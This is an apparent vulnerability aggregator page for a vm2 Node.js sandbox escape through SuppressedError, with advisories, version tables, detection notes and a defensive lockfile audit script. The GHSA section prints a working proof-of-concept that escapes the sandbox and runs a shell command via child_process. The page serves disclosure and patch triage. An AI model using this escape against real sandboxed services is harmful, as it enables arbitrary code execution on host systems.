CVE-2026-26332
Published 2026-05-04
Priority: P2 · 64 · Critical · CVSS 3.1: 10.0
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.71% (48.9th percentile)
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0.
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform | automation-portal | — | — |
| patriksimek | vm2 | < 3.11.0 | 3.11.0 |
| rhdh | rhdh-hub-rhel9 | — | — |
| vm2_project | vm2 | < 3.11.0 | 3.11.0 |
| vm2_project | vm2 | >= 0 < 3.11.0 | 3.11.0 |
Detection & IOCs (extracted from sources)
- Sandbox escape is triggered through the `SuppressedError` mechanism in vm2, which causes rejection callbacks to be handled on the host side instead of inside the sandbox isolation. Monitor for unexpected code execution (child processes, file or network access) originating from processes that run vm2 sandbox contexts.
- Any Node.js process running a vm2 version prior to 3.11.0 is vulnerable; detect outdated vm2 package versions (including nested copies under other packages) in deployed environments.
- Review the two upstream fixing commits (listed in the Bugzilla entry below) to understand the exact code paths changed and build targeted code-level detections or audit rules around `SuppressedError` handling in vm2.
- Red Hat Developer Hub (rhdh/rhdh-hub-rhel9) is not affected because vm2 is only a development dependency there and the vulnerable code path cannot be reached by an adversary; do not prioritize patching in that context.
- The Self-service automation portal 2 package (ansible-automation-platform/automation-portal) is confirmed affected and should be prioritized for patching to vm2 >= 3.11.0.
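The two inventory points above (find every vm2 below 3.11.0, and distinguish a reachable production copy from a dev-only one, since Red Hat rated its dev-only copy unaffected) can be checked directly against an npm lockfile. The script below is an added example, not code from the advisory or the vm2 project. It assumes the npm lockfileVersion 2/3 layout, where `packages` is keyed by `node_modules/...` path and entries reachable only through devDependencies carry `"dev": true`; the sample lockfile is constructed inline for illustration.

```javascript
// Added example: audit an npm package-lock.json for vm2 installs below the
// fixed version (3.11.0) and rank them by reachability. Not vm2 project code.
const FIXED = "3.11.0";

// Minimal numeric major.minor.patch comparison. Assumption: lockfile versions
// are plain x.y.z (true for published vm2 releases); pre-release tags ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

function compareVersions(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

function isVulnerableVm2(version) {
  return compareVersions(version, FIXED) < 0;
}

// Walk the lockfileVersion 2/3 "packages" map. Keys are node_modules paths,
// so nested copies such as node_modules/foo/node_modules/vm2 are found too.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path) continue; // "" is the root project entry, not a dependency
    const name = path.split("node_modules/").pop();
    if (name !== "vm2") continue;
    findings.push({
      path,
      version: meta.version,
      dev: meta.dev === true, // npm marks dev-only reachable packages this way
      vulnerable: isVulnerableVm2(meta.version),
    });
  }
  return findings;
}

// Triage label: reachable vulnerable copies first, dev-only copies second
// (still worth a review, as the Red Hat assessment shows), patched last.
const RANK = { "PATCH NOW": 0, "dev-only (review)": 1, patched: 2 };

function classify(f) {
  if (!f.vulnerable) return "patched";
  return f.dev ? "dev-only (review)" : "PATCH NOW";
}

function summarize(findings) {
  return findings
    .map((f) => ({ ...f, priority: classify(f) }))
    .sort((a, b) => RANK[a.priority] - RANK[b.priority]);
}

// Constructed sample lockfile (hypothetical package names): one nested
// production vm2 3.10.4, one dev-only vm2 3.9.19, one patched top-level 3.11.0.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "portal", version: "1.0.0" },
    "node_modules/some-runner": { version: "2.1.0", dependencies: { vm2: "^3.10.0" } },
    "node_modules/some-runner/node_modules/vm2": { version: "3.10.4" },
    "node_modules/test-tool": { version: "0.5.0", dev: true },
    "node_modules/test-tool/node_modules/vm2": { version: "3.9.19", dev: true },
    "node_modules/vm2": { version: "3.11.0" },
  },
};

for (const f of summarize(auditLockfile(SAMPLE_LOCK))) {
  console.log(`${f.priority.padEnd(18)} vm2@${f.version}  ${f.path}${f.dev ? "  [dev]" : ""}`);
}
```

To run it against a real project, replace `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`. A dev-only hit is not automatically safe: the Red Hat finding rests on the vulnerable code path being unreachable in that product, so confirm that vm2 is not bundled into anything shipped before closing the ticket.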
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| vendor_redhat | — | 10.0 | CRITICAL | — |
GHSA
VM2 Has a Sandbox Escape Issue via SuppressedError
ghsa · 2026-05-05 · CRITICAL · CWE-693
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.
### PoC
```js
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
// DisposableStack runs its deferred callbacks in reverse order on dispose();
// when more than one of them throws, the later throw is wrapped together with
// the earlier one in a SuppressedError.
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
  // Runs first. Reading .stack on an Error whose name is a Symbol makes the
  // engine throw a TypeError that reaches the sandbox without vm2's proxying.
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  ds.dispose();
} catch(e) {
  // e is the SuppressedError: e.error is null, e.suppressed is that TypeError.
  // Its constructor.constructor is the host realm's Function, which gives
  // access to the host process object and from there to child_process.
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" });
}
`);
```
VulDB
patriksimek vm2 up to 3.10.x code injection (GHSA-55hx-c926-fr95 / WID-SEC-2026-1349)
vuldb · 2026-05-04 · CVSS 9.8 · CRITICAL
A vulnerability categorized as critical has been discovered in patriksimek vm2 up to 3.10.x. The affected element is an unknown function. The manipulation results in code injection.
This vulnerability is identified as CVE-2026-26332. The attack can be executed remotely. No exploit is available.
It is advisable to upgrade the affected component.
Red Hat
vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
vendor_redhat · 2026-05-04 · CVSS 10.0 · CRITICAL · CWE-653
A flaw was found in vm2, an open-source sandbox for Node.js. This vulnerability allows a remote attacker to escape the sandbox environment by exploiting the `SuppressedError` mechanism. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the affected system.
Statement: This is an Important flaw in the vm2 Node.js sandbox, enabling a remote attacker to escape the sandbox and achieve arbitrary code execution. This happens because the sandbox fails to run rejection callbacks within the sandbox isolation; an attacker that has privileges or tricks the user into running maliciously crafted code can leverage that to cause suppressed errors to be hand
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2026-26332 vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
bugzilla · 2026-05-04 · CVSS 10.0 · CRITICAL
Discussion:
Upstream public commits fixing this issue:
- https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
- https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
Those commits are contained in the following upstream releases:
```text
$ git tag --contains 4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
v3.11.0
v3.11.1
v3.11.2
v3.11.3
$ git tag --contains d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
v3.11.0
v3.11.1
v3.11.2
v3.11.3
```
Hackernews
vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
blogs_hackernews · 2026-05-07 · CVSS 10.0 · filed under CVE-2026-24118 [CRITICAL]
A dozen critical security vulnerabilities have been disclosed in the vm2 Node.js library that could be exploited by bad actors to break out of the sandbox and execute arbitrary code on susceptible systems.
vm2 is an open-source library used to run untrusted JavaScript code inside a secure sandbox by intercepting and proxying JavaScript objects to prevent sandboxed code from accessing the host environment.
The security flaws are listed below:
CVE-2026-24118 (CVSS score: 9.8) - A vulnerability that allows sandbox escape via "__lookupGette
References
- https://github.com/patriksimek/vm2/releases/tag/v3.11.0
- https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95
- https://access.redhat.com/security/cve/CVE-2026-26332
- https://bugzilla.redhat.com/show_bug.cgi?id=2466508
- https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-26332.json